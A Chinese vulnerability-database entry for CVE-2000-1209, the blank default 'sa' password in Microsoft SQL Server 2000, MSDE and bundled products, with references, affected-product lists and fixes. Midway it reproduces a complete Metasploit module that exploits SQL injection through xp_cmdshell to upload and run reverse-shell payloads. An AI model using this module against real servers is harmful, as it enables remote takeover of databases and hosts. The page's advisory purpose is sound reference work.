CVE-2000-1209
CVSS10.0
发布时间 :2002-08-12 00:00:00
修订时间 :2016-10-17 22:09:16
NMCOPS    

[原文]The "sa" account is installed with a default null password on (1) Microsoft SQL Server 2000, (2) SQL Server 7.0, and (3) Data Engine (MSDE) 1.0, including third party packages that use these products such as (4) Tumbleweed Secure Mail (MMS) (5) Compaq Insight Manager, and (6) Visio 2000, which allows remote attackers to gain privileges, as exploited by worms such as Voyager Alpha Force and Spida.


[CNNVD]Microsoft MSDE/SQL Server 2000桌面引擎默认配置空口令漏洞(CNNVD-200208-100)

        
        Microsoft SQL Server Desktop Engine(MSDE)是一款Microsoft用来提供数据库管理服务的产品,Microsoft SQL Server 2000 Desktop Engine是一款Microsoft分发的数据库SQL SERVER2000共享数据引擎。
        Microsoft SQL Server Desktop Engine(MSDE)和SQL Server 2000 Desktop Engine默认配置存在漏洞,可导致远程攻击者以管理员权限访问数据库。
        Microsoft SQL Server Desktop Engine(MSDE)和SQL Server 2000 Desktop Engine默认配置其管理员密码为空,远程攻击者可以利用此漏洞以管理员权限访问数据库。
        目前已经存在利用Microsoft SQL server和一些衍生产品MSDE和SQL Server 2000 Desktop Engine的默认空密码进行攻击的蠕虫。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:compaq:insight_manager_xe:1.21Compaq Insight Manager XE 1.21
cpe:/a:compaq:insight_manager_xe:2.1bCompaq Insight Manager XE 2.1b
cpe:/a:compaq:insight_manager:7.0:sp1
cpe:/a:compaq:insight_manager_xe:2.2Compaq Insight Manager XE 2.2
cpe:/a:microsoft:data_engine:1.0Microsoft data_engine 1.0
cpe:/a:microsoft:msde:2000Microsoft sql_server_desktop_engine 2000
cpe:/a:compaq:insight_manager_xe:2.1Compaq Insight Manager XE 2.1
cpe:/a:compaq:insight_manager_xe:1.1Compaq Insight Manager XE 1.1
cpe:/a:compaq:insight_manager:7.0Compaq Insight Manager 7.0
cpe:/a:compaq:insight_manager_xe:2.1cCompaq Insight Manager XE 2.1c

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1209
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1209
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-100
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=96333895000350&w=2
(UNKNOWN)  BUGTRAQ  20000710 MSDE / Re: Default Password Database
http://marc.info/?l=bugtraq&m=96593218804850&w=2
(UNKNOWN)  BUGTRAQ  20000810 Tumbleweed Worldsecure (MMS) BLANK 'sa' account password
http://marc.info/?l=bugtraq&m=96644570412692&w=2
(UNKNOWN)  BUGTRAQ  20000816 Released Patch: Tumbleweed Worldsecure (MMS) BLANK 'sa' account password
http://online.securityfocus.com/archive/1/273639
(UNKNOWN)  BUGTRAQ  20020522 Opty-Way Enterprise includes MSDE with sa <blank>
http://security-archive.merton.ox.ac.uk/bugtraq-200008/0233.html
(UNKNOWN)  BUGTRAQ  20000815 MS-SQL 'sa' user exploit code
http://support.microsoft.com/default.aspx?scid=kb;%5BLN%5D;Q313418
(UNKNOWN)  MSKB  Q313418
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q321081
(UNKNOWN)  MSKB  Q321081
http://www.iss.net/security_center/static/1459.php
(VENDOR_ADVISORY)  XF  mssql-no-sapassword(1459)
http://www.kb.cert.org/vuls/id/635463
(VENDOR_ADVISORY)  CERT-VN  VU#635463
http://www.microsoft.com/security/security_bulletins/ms02020_sql.asp
(UNKNOWN)  CONFIRM  http://www.microsoft.com/security/security_bulletins/ms02020_sql.asp
http://www.securityfocus.com/bid/4797
(UNKNOWN)  BID  4797

- 漏洞信息

Microsoft MSDE/SQL Server 2000桌面引擎默认配置空口令漏洞
危急 配置错误
2002-08-12 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft SQL Server Desktop Engine(MSDE)是一款Microsoft用来提供数据库管理服务的产品,Microsoft SQL Server 2000 Desktop Engine是一款Microsoft分发的数据库SQL SERVER2000共享数据引擎。
        Microsoft SQL Server Desktop Engine(MSDE)和SQL Server 2000 Desktop Engine默认配置存在漏洞,可导致远程攻击者以管理员权限访问数据库。
        Microsoft SQL Server Desktop Engine(MSDE)和SQL Server 2000 Desktop Engine默认配置其管理员密码为空,远程攻击者可以利用此漏洞以管理员权限访问数据库。
        目前已经存在利用Microsoft SQL server和一些衍生产品MSDE和SQL Server 2000 Desktop Engine的默认空密码进行攻击的蠕虫。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 手工设置强壮的管理员口令。
        厂商补丁:
        Microsoft
        ---------
        Microsoft提供如下地址参考对SQL进行安全设置:
        * Q322336 HOW TO: Verify and Change the System Administrator Password by Using MSD
        
        http://support.microsoft.com/default.aspx?scid=kb;EN-US;q322336

        * Q321081 Visio Installation of MSDE Creates an 'sa' Account with a Blank Password
        
        http://support.microsoft.com/default.aspx?scid=kb;EN-US;q321081

- 漏洞信息 (F97992)

Microsoft SQL Server Payload Execution via SQL injection (PacketStormID:F97992)
2011-01-29 00:00:00
Rodrigo Marcos,David Kennedy,jduck  metasploit.com
exploit,arbitrary,sql injection
CVE-2000-0402,CVE-2000-1209,OSVDB-15757
[点击下载]

This Metasploit module will execute an arbitrary payload on a Microsoft SQL Server, using a SQL injection vulnerability. Once a vulnerability is identified this module will use xp_cmdshell to upload and execute Metasploit payloads. It is necessary to specify the exact point where the SQL injection vulnerability happens.

##
# $Id: mssql_payload.rb 11392 2010-12-21 20:36:34Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::MSSQL_SQLI
	include Msf::Exploit::CmdStagerVBS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft SQL Server Payload Execution via SQL injection',
			'Description'    => %q{
					This module will execute an arbitrary payload on a Microsoft SQL
				Server, using a SQL injection vulnerability.

				Once a vulnerability is identified this module
				will use xp_cmdshell to upload and execute Metasploit payloads.
				It is necessary to specify the exact point where the SQL injection
				vulnerability happens. For example, given the following injection:

				http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical

				you would need to set the following path:
				set GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar

				In regard to the payload, unless there is a closed port in the web server,
				you dont want to use any "bind" payload, specially on port 80, as you will
				stop reaching the vulnerable web server host. You want a "reverse" payload, probably to
				your port 80 or to any other outbound port allowed on the firewall.
				For privileged ports execute Metasploit msfconsole as root.

				Currently, three delivery methods are supported.

				First, the original method uses Windows 'debug.com'. File size restrictions are
				avoidied by incorporating the debug bypass method presented by SecureStat at
				Defcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems.

				A second method takes advantage of the Command Stager subsystem. This allows using
				various techniques, such as using a TFTP server, to send the executable. By default
				the Command Stager uses 'wcsript.exe' to generate the executable on the target.

				Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the
				payload on the target.

				NOTE: This module will leave a payload executable on the target system when the
				attack is finished.

			},
			'Author'         =>
				[
					'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',  # original module, debug.exe method, powershell method
					'jduck',  # command stager mods
					'Rodrigo Marcos' # SQL injection mods
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11392 $',
			'References'     =>
				[
					# 'sa' password in logs
					[ 'CVE', '2000-0402' ],
					[ 'OSVDB', '557' ],
					[ 'BID', '1281' ],

					# blank default 'sa' password
					[ 'CVE', '2000-1209' ],
					[ 'OSVDB', '15757' ],
					[ 'BID', '4797' ],

					# code and comments
					[ 'URL', 'http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/' ]

				],
			'Platform'       => 'win',
			'Payload'        =>
				{
					'BadChars' 	=> "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%",
				},
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 30 2000'
			))
		register_options(
			[
				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
				OptString.new('DELIVERY', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'old' ])
			])
	end

	# This is method required for the CmdStager to work...
	def execute_command(cmd, opts)
		mssql_xpcmdshell(cmd, datastore['VERBOSE'])
	end

	def exploit

		method = datastore['DELIVERY'].downcase

		if (method =~ /^cmd/)
			execute_cmdstager({ :linemax => 1500, :nodelete => true })
			#execute_cmdstager({ :linemax => 1500 })
		else
			# Generate the EXE, this is the same no matter what delivery mechanism we use
			exe = generate_payload_exe

			# Use powershell method for payload delivery if specified
			if (method =~ /^ps/) or (method =~ /^power/)
				powershell_upload_exec(exe)
			else
				# Otherwise, fall back to the old way..
				mssql_upload_exec(exe, datastore['VERBOSE'])
			end
		end
		print_status("Almost there, the stager takes a while to execute. Waiting 50 seconds...")
		select(nil,nil,nil,50)
		handler
		disconnect
	end


end

    

- 漏洞信息

15757
Microsoft SQL Server sa Account Default Null Password
Remote / Network Access Authentication Management
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

By default, Microsoft SQL Server installs with a default password. The 'sa' account has a null password which is publicly known and documented. This allows remote attackers to trivially access the program or system.

- 时间线

2000-07-10 Unknow
2000-07-10 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: secure the 'sa' account with a password.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft MSDE/SQL Server 2000 Desktop Engine Default Configuration Vulnerability
Configuration Error 4797
Yes No
2002-05-22 12:00:00 2009-07-11 12:46:00
Credited to Adrian Romo of Quilogy.

- 受影响的程序版本

Optima Opty-Way Enterprise 1.0
Microsoft SQL Server 2000 Desktop Engine
+ Akiva WebBoard 6.1
+ Microsoft Access 2000
+ Microsoft Application Center 2000
+ Microsoft BizTalk Server 2000 Developer Edition
+ Microsoft BizTalk Server 2000 Enterprise Edition
+ Microsoft BizTalk Server 2000 Standard Edition
+ Microsoft BizTalk Server 2002 Developer Edition
+ Microsoft BizTalk Server 2002 Enterprise Edition
+ Microsoft Office 2000
+ Microsoft Project Central Server
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft Visio 2000 Enterprise Edition
+ Microsoft Visio Enterprise Network Tools
+ Microsoft Visual FoxPro 6.0
+ Microsoft Visual Studio 6.0
+ Microsoft Visual Studio .NET Academic Edition 0
+ Microsoft Visual Studio .NET Enterprise Architect Edition
+ Microsoft Visual Studio .NET Enterprise Developer Edition
+ Microsoft Visual Studio .NET Professional Edition
+ SmartMax Software MailMax 5.0
+ Veritas Software Backup Exec for Windows Servers 9.0
Microsoft MSDE 1.0
+ Microsoft Visio 2000 Enterprise Edition SR1
+ Microsoft Visio 2000 Enterprise Edition SR1
+ Microsoft Visio 2000 Enterprise Edition
+ Microsoft Visio 2000 Enterprise Edition
+ Microsoft Visual Studio 6.0
+ Microsoft Visual Studio 6.0
+ Optima Opty-Way Enterprise 1.0
+ Optima Opty-Way Enterprise 1.0
+ Websense Reporter 6.3.1
+ Websense Reporter 6.3.1
Compaq Open SAN Manager 1.0 c
Compaq Insight Manager XE 2.2
Compaq Insight Manager XE 2.1 c
Compaq Insight Manager XE 2.1 b
Compaq Insight Manager XE 2.1
Compaq Insight Manager XE 1.21
Compaq Insight Manager XE 1.1
Compaq Insight Manager 7.0 SP1
Compaq Insight Manager 7.0
Avaya CentreVu Explorer II
Avaya CentreVu / Nice Call Recording System 8.5

- 漏洞讨论

It has been reported Microsoft MSDE and SQL Server 2000 Desktop Engine are configured by default with a null administrative password by default. Remote attackers may exploit this flaw to gain administrative access to the database if the password has not been manually changed.

Compaq Insight Manager XE versions 1.1 and later include the capability to use MSDE. MSDE is not installed as part of Compaq Insight Manager by default. When MSDE is installed via Compaq Insight Manager, it is recommended during that install that users change the 'sa' administrative password. Installs via Compaq Management CD or Insight Manager 7 softpaqs include no such recommendation.

It should be noted that a worm is currently propagating due to default null passwords in Microsoft SQL server and derived products such as MSDE and SQL Server 2000 Desktop Engine.

- 漏洞利用

No exploit code is required.

- 解决方案

Avaya have released a security advisory that contains recommended actions to fix this issue in CentreVu Explorer II and CentreVu/Nice Call Recording System 8.5 and later. Please see the referenced advisory for further details.

Microsoft has released security recommendations for administrators of SQL server and related products. A link to this document is included in the links section of this record bulletin.

Some Compaq Insight Manager releases include the capability to use MSDE. If MSDE is installed, users are advised to ensure that the default null administrative password is changed. The service must be restarted for any changes to take effect.

HP has released a security advisory (HPSBMA01168) detailing a revision to the Compaq advisory SSRT2195. Please see the referenced advisory for further information.

Setting a hard-to-guess password will effectively eliminate this vulnerability.

A patch is available for Compaq Open SAN Manager:


Compaq Open SAN Manager 1.0 c

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站